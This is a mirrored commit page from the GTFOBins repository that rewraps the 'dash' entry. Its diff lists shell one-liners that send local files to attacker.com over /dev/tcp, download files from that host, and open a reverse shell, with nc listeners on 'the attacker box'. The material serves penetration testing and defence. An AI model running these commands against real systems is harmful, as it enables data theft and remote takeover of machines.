public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-12-25 22:40:10 +01:00
Code Issues Projects Releases Wiki Activity

Wrap dash commands

Browse Source
This commit is contained in:
Emilio Pinna 2018-05-24 22:43:04 +01:00
parent fda972eeaa
commit a442b4cf34
1 changed files with 19 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
_gtfobins/dash.md
View File

@ -9,33 +9,33 @@ functions:
upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
dash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
cat $LFILE > /dev/tcp/$RHOST/$RPORT
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
dash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download:
- description: Fetch a remote file via HTTP GET request.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_get
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
dash -c '(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d \"\r\")" != "" ]; do read i; done; cat) > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
code: |-
RHOST=attacker.com
RPORT=12345
LFILE=file_to_get
cat < /dev/tcp/$RHOST/$RPORT > $LFILE
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
dash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
dash -i >& /dev/tcp/$RHOST/$RPORT 0>&1
export RHOST=attacker.com
export RPORT=12345
dash -c 'dash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
---